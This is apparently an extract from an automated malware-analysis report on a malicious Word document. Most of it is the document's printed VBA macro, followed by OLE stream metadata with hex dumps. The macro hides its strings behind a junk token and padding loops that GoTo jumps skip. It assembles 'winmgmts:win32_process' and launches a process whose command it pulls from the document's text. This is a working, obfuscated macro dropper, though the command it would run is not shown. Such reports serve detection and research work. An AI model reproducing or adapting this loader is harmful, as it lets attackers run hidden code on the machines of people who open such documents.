        ZXUkHUDE = UBound(wqMdGGa) - 1
        wzeYO = 0
Set oTxSFKM = PwelHHe
        Do Until ZXUkHUDE > ZXUkHUDE
            If wqMdGGa(ZXUkHUDE) = 46 Or ZXUkHUDE = ZXUkHUDE Then
                dscc = "sasdsacc" & (wzeYO / 2) + 1 & " to " & (ZXUkHUDE / 2) + 1 & MidB$(wqMdGGa, wzeYO + 1, ZXUkHUDE - wzeYO + 3)
                wzeYO = ZXUkHUDE + 2
            End If
            ZXUkHUDE = ZXUkHUDE + 2
        Loop
    Next
duvyGCCDG:
skuwd = Ga63a6ozyok1lu + Tvh1u8793dltn9 . Content + P74x_w06z8wy
   GoTo NreFC
Set zkqnNAIz = DOUPnxsoh
    Dim ofBYJAJ, LfOAoxD, gNcNXLsAj As Long
    Dim BMfqCFLcE As Word.Paragraph
    Dim zxBvQRHoF() As Byte
    For Each BMfqCFLcE In Tvh1u8793dltn9.Paragraphs
        zxBvQRHoF = BMfqCFLcE.Range
        dscc = "sadsaccc" & BMfqCFLcE.Range
        LfOAoxD = UBound(zxBvQRHoF) - 1
        ofBYJAJ = 0
Set GXzgs = tmhzE
        Do Until LfOAoxD > LfOAoxD
            If zxBvQRHoF(LfOAoxD) = 46 Or LfOAoxD = LfOAoxD Then
                dscc = "sasdsacc" & (ofBYJAJ / 2) + 1 & " to " & (LfOAoxD / 2) + 1 & MidB$(zxBvQRHoF, ofBYJAJ + 1, LfOAoxD - ofBYJAJ + 3)
                ofBYJAJ = LfOAoxD + 2
            End If
            LfOAoxD = LfOAoxD + 2
        Loop
    Next
NreFC:
wjnsc = "x [ sh bpx [ sh b"
T8m6rm0ljeoit = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
   GoTo fNBrHlEAv
Set JJlPCJ = obTyv
    Dim wJpzu, IFdNKp, KgsfYDHSH As Long
    Dim rVJUDUKH As Word.Paragraph
    Dim cXPNdFE() As Byte
    For Each rVJUDUKH In Tvh1u8793dltn9.Paragraphs
        cXPNdFE = rVJUDUKH.Range
        dscc = "sadsaccc" & rVJUDUKH.Range
        IFdNKp = UBound(cXPNdFE) - 1
        wJpzu = 0
Set XHCLGl = JoHgzC
        Do Until IFdNKp > IFdNKp
            If cXPNdFE(IFdNKp) = 46 Or IFdNKp = IFdNKp Then
                dscc = "sasdsacc" & (wJpzu / 2) + 1 & " to " & (IFdNKp / 2) + 1 & MidB$(cXPNdFE, wJpzu + 1, IFdNKp - wJpzu + 3)
                wJpzu = IFdNKp + 2
            End If
            IFdNKp = IFdNKp + 2
        Loop
    Next
fNBrHlEAv:
Cyum5s6729q4h = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
   GoTo KAIEzBBDB
Set lMxOJUo = BYQeC
    Dim mDUMGI, KwsnJ, cwrlb As Long
    Dim PlllYA As Word.Paragraph
    Dim bIdgDIKT() As Byte
    For Each PlllYA In Tvh1u8793dltn9.Paragraphs
        bIdgDIKT = PlllYA.Range
        dscc = "sadsaccc" & PlllYA.Range
        KwsnJ = UBound(bIdgDIKT) - 1
        mDUMGI = 0
Set OELBME = PpRoB
        Do Until KwsnJ > KwsnJ
            If bIdgDIKT(KwsnJ) = 46 Or KwsnJ = KwsnJ Then
                dscc = "sasdsacc" & (mDUMGI / 2) + 1 & " to " & (KwsnJ / 2) + 1 & MidB$(bIdgDIKT, mDUMGI + 1, KwsnJ - mDUMGI + 3)
                mDUMGI = KwsnJ + 2
            End If
            KwsnJ = KwsnJ + 2
        Loop
    Next
KAIEzBBDB:
D72efu7a0how7es = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
   GoTo OXSmB
Set opZGEJ = OfcyMA
    Dim UZSgXY, SWiOAACq, axfnb As Long
    Dim RSOyLFC As Word.Paragraph
    Dim qZUuB() As Byte
    For Each RSOyLFC In Tvh1u8793dltn9.Paragraphs
        qZUuB = RSOyLFC.Range
        dscc = "sadsaccc" & RSOyLFC.Range
        SWiOAACq = UBound(qZUuB) - 1
        UZSgXY = 0
Set fFCxQGp = VFEoD
        Do Until SWiOAACq > SWiOAACq
            If qZUuB(SWiOAACq) = 46 Or SWiOAACq = SWiOAACq Then
                dscc = "sasdsacc" & (UZSgXY / 2) + 1 & " to " & (SWiOAACq / 2) + 1 & MidB$(qZUuB, UZSgXY + 1, SWiOAACq - UZSgXY + 3)
                UZSgXY = SWiOAACq + 2
            End If
            SWiOAACq = SWiOAACq + 2
        Loop
    Next
OXSmB:
C22jnnyve59b2 = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"
   GoTo rYDvv
Set GOSKJ = AOSGE
    Dim pblpJEP, yNTJYEFj, EFfaBWHC As Long
    Dim OlVYDaAK As Word.Paragraph
    Dim iVxnxGH() As Byte
    For Each OlVYDaAK In Tvh1u8793dltn9.Paragraphs
        iVxnxGH = OlVYDaAK.Range
        dscc = "sadsaccc" & OlVYDaAK.Range
        yNTJYEFj = UBound(iVxnxGH) - 1
        pblpJEP = 0
Set bquxP = zIlZF
        Do Until yNTJYEFj > yNTJYEFj
            If iVxnxGH(yNTJYEFj) = 46 Or yNTJYEFj = yNTJYEFj Then
                dscc = "sasdsacc" & (pblpJEP / 2) + 1 & " to " & (yNTJYEFj / 2) + 1 & MidB$(iVxnxGH, pblpJEP + 1, yNTJYEFj - pblpJEP + 3)
                pblpJEP = yNTJYEFj + 2
            End If
            yNTJYEFj = yNTJYEFj + 2
        Loop
    Next
rYDvv:
Cew5ncdrgctcj = D72efu7a0how7es + C22jnnyve59b2 + Cyum5s6729q4h + wjnsc + T8m6rm0ljeoit
   GoTo tgyiIBI
Set yJRyW = IeEnJ
    Dim FJGWlF, boTEsG, DAKdJA As Long
    Dim kjSGfNWH As Word.Paragraph
    Dim NTrejcdK() As Byte
    For Each kjSGfNWH In Tvh1u8793dltn9.Paragraphs
        NTrejcdK = kjSGfNWH.Range
        dscc = "sadsaccc" & kjSGfNWH.Range
        boTEsG = UBound(NTrejcdK) - 1
        FJGWlF = 0
Set LVHhGsGJd = PRawGB
        Do Until boTEsG > boTEsG
            If NTrejcdK(boTEsG) = 46 Or boTEsG = boTEsG Then
                dscc = "sasdsacc" & (FJGWlF / 2) + 1 & " to " & (boTEsG / 2) + 1 & MidB$(NTrejcdK, FJGWlF + 1, boTEsG - FJGWlF + 3)
                FJGWlF = boTEsG + 2
            End If
            boTEsG = boTEsG + 2
        Loop
    Next
tgyiIBI:
Pey8y7gr_e6_y = K532dwnyk0pybrc(Cew5ncdrgctcj)
   GoTo urNCUFJBF
Set aekya = NDNfzBJJ
    Dim QyRiIm, WEIxlI, rZGGJBDEH As Long
    Dim EvkuEA As Word.Paragraph
    Dim ZFzwZcA() As Byte
    For Each EvkuEA In Tvh1u8793dltn9.Paragraphs
        ZFzwZcA = EvkuEA.Range
        dscc = "sadsaccc" & EvkuEA.Range
        WEIxlI = UBound(ZFzwZcA) - 1
        QyRiIm = 0
Set Gownu = BLbjEJvG
        Do Until WEIxlI > WEIxlI
            If ZFzwZcA(WEIxlI) = 46 Or WEIxlI = WEIxlI Then
                dscc = "sasdsacc" & (QyRiIm / 2) + 1 & " to " & (WEIxlI / 2) + 1 & MidB$(ZFzwZcA, QyRiIm + 1, WEIxlI - QyRiIm + 3)
                QyRiIm = WEIxlI + 2
            End If
            WEIxlI = WEIxlI + 2
        Loop
    Next
urNCUFJBF:
Set V5rp8m_1bqwi1poyk = CreateObject(Pey8y7gr_e6_y)
   GoTo TQOflAN
Set arTLjQ = BeNoB
    Dim iqpwDAG, nSFIYBiG, KqVudsGK As Long
    Dim wFpBJBJE As Word.Paragraph
    Dim bKloWCbL() As Byte
    For Each wFpBJBJE In Tvh1u8793dltn9.Paragraphs
        bKloWCbL = wFpBJBJE.Range
        dscc = "sadsaccc" & wFpBJBJE.Range
        nSFIYBiG = UBound(bKloWCbL) - 1
        iqpwDAG = 0
Set Mpmet = qqdsB
        Do Until nSFIYBiG > nSFIYBiG
            If bKloWCbL(nSFIYBiG) = 46 Or nSFIYBiG = nSFIYBiG Then
                dscc = "sasdsacc" & (iqpwDAG / 2) + 1 & " to " & (nSFIYBiG / 2) + 1 & MidB$(bKloWCbL, iqpwDAG + 1, nSFIYBiG - iqpwDAG + 3)
                iqpwDAG = nSFIYBiG + 2
            End If
            nSFIYBiG = nSFIYBiG + 2
        Loop
    Next
TQOflAN:
njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
nnjasd = K532dwnyk0pybrc(njcnja)
   GoTo OgZqDzXrC
Set FSWADGB = SlFMhE
    Dim fWUcJcE, bDqBloVC, OZDOK As Long
    Dim JRtnBYH As Word.Paragraph
    Dim pXRdBD() As Byte
    For Each JRtnBYH In Tvh1u8793dltn9.Paragraphs
        pXRdBD = JRtnBYH.Range
        dscc = "sadsaccc" & JRtnBYH.Range
        bDqBloVC = UBound(pXRdBD) - 1
        fWUcJcE = 0
Set axZmGGE = TtNYEBE
        Do Until bDqBloVC > bDqBloVC
            If pXRdBD(bDqBloVC) = 46 Or bDqBloVC = bDqBloVC Then
                dscc = "sasdsacc" & (fWUcJcE / 2) + 1 & " to " & (bDqBloVC / 2) + 1 & MidB$(pXRdBD, fWUcJcE + 1, bDqBloVC - fWUcJcE + 3)
                fWUcJcE = bDqBloVC + 2
            End If
            bDqBloVC = bDqBloVC + 2
        Loop
    Next
OgZqDzXrC:
V5rp8m_1bqwi1poyk.Create nnjasd, Koy_r2oxzs1, X2yj58n39t50co
   GoTo ScLedvBEA
Set yktdUg = kxpwbBJF
    Dim wEvDIdG, lqbmGD, elJkJIB As Long
    Dim IVjOAGZe As Word.Paragraph
    Dim FcotIf() As Byte
    For Each IVjOAGZe In Tvh1u8793dltn9.Paragraphs
        FcotIf = IVjOAGZe.Range
        dscc = "sadsaccc" & IVjOAGZe.Range
        lqbmGD = UBound(FcotIf) - 1
        wEvDIdG = 0
Set sJtmJ = UYxXOcIJG
        Do Until lqbmGD > lqbmGD
            If FcotIf(lqbmGD) = 46 Or lqbmGD = lqbmGD Then
                dscc = "sasdsacc" & (wEvDIdG / 2) + 1 & " to " & (lqbmGD / 2) + 1 & MidB$(FcotIf, wEvDIdG + 1, lqbmGD - wEvDIdG + 3)
                wEvDIdG = lqbmGD + 2
            End If
            lqbmGD = lqbmGD + 2
        Loop
    Next
ScLedvBEA:
End Function
Function K532dwnyk0pybrc(Ev1oy1be511zamut8)
On Error Resume Next
   GoTo pzxJi
Set wrpigDnBA = bHGFAGJ
    Dim fUGOALvdN, FKISJTLG, OpNHJEa As Long
    Dim ZlnBbxF As Word.Paragraph
    Dim pxjzGA() As Byte
    For Each ZlnBbxF In Tvh1u8793dltn9.Paragraphs
        pxjzGA = ZlnBbxF.Range
        dscc = "sadsaccc" & ZlnBbxF.Range
        FKISJTLG = UBound(pxjzGA) - 1
        fUGOALvdN = 0
Set xNIlBBInl = OaOIEKmCA
        Do Until FKISJTLG > FKISJTLG
            If pxjzGA(FKISJTLG) = 46 Or FKISJTLG = FKISJTLG Then
                dscc = "sasdsacc" & (fUGOALvdN / 2) + 1 & " to " & (FKISJTLG / 2) + 1 & MidB$(pxjzGA, fUGOALvdN + 1, FKISJTLG - fUGOALvdN + 3)
                fUGOALvdN = FKISJTLG + 2
            End If
            FKISJTLG = FKISJTLG + 2
        Loop
    Next
pzxJi:
Lynlzg8g_wcyt8ojr = Ev1oy1be511zamut8
   GoTo QtjyA
Set phkpFqFCH = DHwdFs
    Dim nHiSH, jHDSG, udnviH As Long
    Dim DLwSlnDF As Word.Paragraph
    Dim pXPTCf() As Byte
    For Each DLwSlnDF In Tvh1u8793dltn9.Paragraphs
        pXPTCf = DLwSlnDF.Range
        dscc = "sadsaccc" & DLwSlnDF.Range
        jHDSG = UBound(pXPTCf) - 1
        nHiSH = 0
Set seTGCvRG = mwvhyA
        Do Until jHDSG > jHDSG
            If pXPTCf(jHDSG) = 46 Or jHDSG = jHDSG Then
                dscc = "sasdsacc" & (nHiSH / 2) + 1 & " to " & (jHDSG / 2) + 1 & MidB$(pXPTCf, nHiSH + 1, jHDSG - nHiSH + 3)
                nHiSH = jHDSG + 2
            End If
            jHDSG = jHDSG + 2
        Loop
    Next
QtjyA:
E4u6ubi3v5l2 = Yw0lmj9uz2sfz0(Lynlzg8g_wcyt8ojr)
   GoTo XxLEEC
Set ZtgGUHFGJ = prgAO
    Dim TMQhTRa, LZepVwu, JPHDBd As Long
    Dim bkUZDN As Word.Paragraph
    Dim QNtsSHe() As Byte
    For Each bkUZDN In Tvh1u8793dltn9.Paragraphs
        QNtsSHe = bkUZDN.Range
        dscc = "sadsaccc" & bkUZDN.Range
        LZepVwu = UBound(QNtsSHe) - 1
        TMQhTRa = 0
Set MxAtNhGI = imnrzOF
        Do Until LZepVwu > LZepVwu
            If QNtsSHe(LZepVwu) = 46 Or LZepVwu = LZepVwu Then
                dscc = "sasdsacc" & (TMQhTRa / 2) + 1 & " to " & (LZepVwu / 2) + 1 & MidB$(QNtsSHe, TMQhTRa + 1, LZepVwu - TMQhTRa + 3)
                TMQhTRa = LZepVwu + 2
            End If
            LZepVwu = LZepVwu + 2
        Loop
    Next
XxLEEC:
K532dwnyk0pybrc = E4u6ubi3v5l2
   GoTo SWSoCG
Set OaVnI = UmQHurWB
    Dim zxEzinCG, EHISACDA, aBRvB As Long
    Dim XdfYSIXX As Word.Paragraph
    Dim wWvlxHJH() As Byte
    For Each XdfYSIXX In Tvh1u8793dltn9.Paragraphs
        wWvlxHJH = XdfYSIXX.Range
        dscc = "sadsaccc" & XdfYSIXX.Range
        EHISACDA = UBound(wWvlxHJH) - 1
        zxEzinCG = 0
Set wVEbaDF = WhmkB
        Do Until EHISACDA > EHISACDA
            If wWvlxHJH(EHISACDA) = 46 Or EHISACDA = EHISACDA Then
                dscc = "sasdsacc" & (zxEzinCG / 2) + 1 & " to " & (EHISACDA / 2) + 1 & MidB$(wWvlxHJH, zxEzinCG + 1, EHISACDA - zxEzinCG + 3)
                zxEzinCG = EHISACDA + 2
            End If
            EHISACDA = EHISACDA + 2
        Loop
    Next
SWSoCG:
End Function
Function Yw0lmj9uz2sfz0(Vld8aalp9dc)
   GoTo nhgrV
Set nfGGCgIdG = JltZHC
    Dim cxvFCyK, lTApi, gLahNHF As Long
    Dim ooYfBGDHB As Word.Paragraph
    Dim hVgaFGj() As Byte
    For Each ooYfBGDHB In Tvh1u8793dltn9.Paragraphs
        hVgaFGj = ooYfBGDHB.Range
        dscc = "sadsaccc" & ooYfBGDHB.Range
        lTApi = UBound(hVgaFGj) - 1
        cxvFCyK = 0
Set QDRLrCD = hbrLsIIaJ
        Do Until lTApi > lTApi
            If hVgaFGj(lTApi) = 46 Or lTApi = lTApi Then
                dscc = "sasdsacc" & (cxvFCyK / 2) + 1 & " to " & (lTApi / 2) + 1 & MidB$(hVgaFGj, cxvFCyK + 1, lTApi - cxvFCyK + 3)
                cxvFCyK = lTApi + 2
            End If
            lTApi = lTApi + 2
        Loop
    Next
nhgrV:
   GoTo NelhA
Set nVwvHB = iyOuxJbS
    Dim fiGUDJCof, ccUPI, xFjGF As Long
    Dim TIdZDCk As Word.Paragraph
    Dim BMzteJlIE() As Byte
    For Each TIdZDCk In Tvh1u8793dltn9.Paragraphs
        BMzteJlIE = TIdZDCk.Range
        dscc = "sadsaccc" & TIdZDCk.Range
        ccUPI = UBound(BMzteJlIE) - 1
        fiGUDJCof = 0
Set MSHSTFGF = vcpiDgaED
        Do Until ccUPI > ccUPI
            If BMzteJlIE(ccUPI) = 46 Or ccUPI = ccUPI Then
                dscc = "sasdsacc" & (fiGUDJCof / 2) + 1 & " to " & (ccUPI / 2) + 1 & MidB$(BMzteJlIE, fiGUDJCof + 1, ccUPI - fiGUDJCof + 3)
                fiGUDJCof = ccUPI + 2
            End If
            ccUPI = ccUPI + 2
        Loop
    Next
NelhA:
   GoTo qjZyxC
Set fPJtR = TVnICGBMg
    Dim OGmjSHH, dxYfn, tsgajz As Long
    Dim VwecCsW As Word.Paragraph
    Dim jpCcJn() As Byte
    For Each VwecCsW In Tvh1u8793dltn9.Paragraphs
        jpCcJn = VwecCsW.Range
        dscc = "sadsaccc" & VwecCsW.Range
        dxYfn = UBound(jpCcJn) - 1
        OGmjSHH = 0
Set ShwUGEG = HoDns
        Do Until dxYfn > dxYfn
            If jpCcJn(dxYfn) = 46 Or dxYfn = dxYfn Then
                dscc = "sasdsacc" & (OGmjSHH / 2) + 1 & " to " & (dxYfn / 2) + 1 & MidB$(jpCcJn, OGmjSHH + 1, dxYfn - OGmjSHH + 3)
                OGmjSHH = dxYfn + 2
            End If
            dxYfn = dxYfn + 2
        Loop
    Next
qjZyxC:
Yw0lmj9uz2sfz0 = Replace(Vld8aalp9dc, "x [ sh b", Zi0fdg4qf12t)
   GoTo CMhXU
Set yEbqhrSDE = ElQBeG
    Dim KGTisCFg, htkDBkB, QbynDCF As Long
    Dim wUyzGJ As Word.Paragraph
    Dim YXZHHCaB() As Byte
    For Each wUyzGJ In Tvh1u8793dltn9.Paragraphs
        YXZHHCaB = wUyzGJ.Range
        dscc = "sadsaccc" & wUyzGJ.Range
        htkDBkB = UBound(YXZHHCaB) - 1
        KGTisCFg = 0
Set oyFNHnHHI = xhcZSBIH
        Do Until htkDBkB > htkDBkB
            If YXZHHCaB(htkDBkB) = 46 Or htkDBkB = htkDBkB Then
                dscc = "sasdsacc" & (KGTisCFg / 2) + 1 & " to " & (htkDBkB / 2) + 1 & MidB$(YXZHHCaB, KGTisCFg + 1, htkDBkB - KGTisCFg + 3)
                KGTisCFg = htkDBkB + 2
            End If
            htkDBkB = htkDBkB + 2
        Loop
    Next
CMhXU:
   GoTo BhNEmrIE
Set PDdhFK = fPExO
    Dim YgziIE, DwikAuvE, fEtRs As Long
    Dim YvQjieFc As Word.Paragraph
    Dim VuThCQHH() As Byte
    For Each YvQjieFc In Tvh1u8793dltn9.Paragraphs
        VuThCQHH = YvQjieFc.Range
        dscc = "sadsaccc" & YvQjieFc.Range
        DwikAuvE = UBound(VuThCQHH) - 1
        YgziIE = 0
Set WfWmdXBB = obcJwDFA
        Do Until DwikAuvE > DwikAuvE
            If VuThCQHH(DwikAuvE) = 46 Or DwikAuvE = DwikAuvE Then
                dscc = "sasdsacc" & (YgziIE / 2) + 1 & " to " & (DwikAuvE / 2) + 1 & MidB$(VuThCQHH, YgziIE + 1, DwikAuvE - YgziIE + 3)
                YgziIE = DwikAuvE + 2
            End If
            DwikAuvE = DwikAuvE + 2
        Loop
    Next
BhNEmrIE:
   GoTo VcRJFFPFy
Set dMAig = FVoXJ
    Dim wzAgBA, zZJyEAC, YqhWFED As Long
    Dim tVHJH As Word.Paragraph
    Dim DLNPo() As Byte
    For Each tVHJH In Tvh1u8793dltn9.Paragraphs
        DLNPo = tVHJH.Range
        dscc = "sadsaccc" & tVHJH.Range
        zZJyEAC = UBound(DLNPo) - 1
        wzAgBA = 0
Set swiEYEUA = ZGOfHDFZ
        Do Until zZJyEAC > zZJyEAC
            If DLNPo(zZJyEAC) = 46 Or zZJyEAC = zZJyEAC Then
                dscc = "sasdsacc" & (wzAgBA / 2) + 1 & " to " & (zZJyEAC / 2) + 1 & MidB$(DLNPo, wzAgBA + 1, zZJyEAC - wzAgBA + 3)
                wzAgBA = zZJyEAC + 2
            End If
            zZJyEAC = zZJyEAC + 2
        Loop
    Next
VcRJFFPFy:
End Function

                                                                    Streams

                                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                    General
                                                                    Stream Path:\x1CompObj
                                                                    File Type:data
                                                                    Stream Size:146
                                                                    Entropy:4.00187355764
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                    General
                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                    File Type:data
                                                                    Stream Size:4096
                                                                    Entropy:0.280441275353
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 520
                                                                    General
                                                                    Stream Path:\x5SummaryInformation
                                                                    File Type:data
                                                                    Stream Size:520
                                                                    Entropy:4.01867247642
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 64 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00
                                                                    Stream Path: 1Table, File Type: data, Stream Size: 6873
                                                                    General
                                                                    Stream Path:1Table
                                                                    File Type:data
                                                                    Stream Size:6873
                                                                    Entropy:6.02451032197
                                                                    Base64 Encoded:True
                                                                    Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                    Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 513
                                                                    General
                                                                    Stream Path:Macros/PROJECT
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Stream Size:513
                                                                    Entropy:5.45796741226
                                                                    Base64 Encoded:True
                                                                    Data ASCII:I D = " { A E 2 F 0 F 9 F - 1 A 9 0 - 4 C B D - 9 8 9 D - 0 7 4 8 C 8 7 B D 5 4 3 } " . . D o c u m e n t = T v h 1 u 8 7 9 3 d l t n 9 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = T w h 1 g b 2 m p d 3 . . M o d u l e = X 1 b q z 0 q a e r 4 3 b 5 2 b f . . E x e N a m e 3 2 = " X o k y b e 1 s n 0 s g n " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 6 C 4 C A 4 9 F A 7 B 9 7 7 F 9 7 7 F 9 7 7 F 9 7 7 F " . . D P B
                                                                    Data Raw:49 44 3d 22 7b 41 45 32 46 30 46 39 46 2d 31 41 39 30 2d 34 43 42 44 2d 39 38 39 44 2d 30 37 34 38 43 38 37 42 44 35 34 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 76 68 31 75 38 37 39 33 64 6c 74 6e 39 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 54 77 68 31 67 62 32 6d 70 64 33 0d 0a 4d 6f 64 75 6c 65 3d 58 31 62 71 7a 30 71 61 65 72 34 33 62 35 32 62 66 0d 0a 45
                                                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 137
                                                                    General
                                                                    Stream Path:Macros/PROJECTwm
                                                                    File Type:data
                                                                    Stream Size:137
                                                                    Entropy:3.83818292894
                                                                    Base64 Encoded:False
                                                                    Data ASCII:T v h 1 u 8 7 9 3 d l t n 9 . T . v . h . 1 . u . 8 . 7 . 9 . 3 . d . l . t . n . 9 . . . T w h 1 g b 2 m p d 3 . T . w . h . 1 . g . b . 2 . m . p . d . 3 . . . X 1 b q z 0 q a e r 4 3 b 5 2 b f . X . 1 . b . q . z . 0 . q . a . e . r . 4 . 3 . b . 5 . 2 . b . f . . . . .
                                                                    Data Raw:54 76 68 31 75 38 37 39 33 64 6c 74 6e 39 00 54 00 76 00 68 00 31 00 75 00 38 00 37 00 39 00 33 00 64 00 6c 00 74 00 6e 00 39 00 00 00 54 77 68 31 67 62 32 6d 70 64 33 00 54 00 77 00 68 00 31 00 67 00 62 00 32 00 6d 00 70 00 64 00 33 00 00 00 58 31 62 71 7a 30 71 61 65 72 34 33 62 35 32 62 66 00 58 00 31 00 62 00 71 00 7a 00 30 00 71 00 61 00 65 00 72 00 34 00 33 00 62 00 35 00 32
                                                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5925
                                                                    General
                                                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                                                    File Type:data
                                                                    Stream Size:5925
                                                                    Entropy:5.67391358744
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                                    Stream Path: Macros/VBA/dir, File Type: Tower32/600/400 68020 object not stripped - version 18435, Stream Size: 668
                                                                    General
                                                                    Stream Path:Macros/VBA/dir
                                                                    File Type:Tower32/600/400 68020 object not stripped - version 18435
                                                                    Stream Size:668
                                                                    Entropy:6.36196685937
                                                                    Base64 Encoded:True
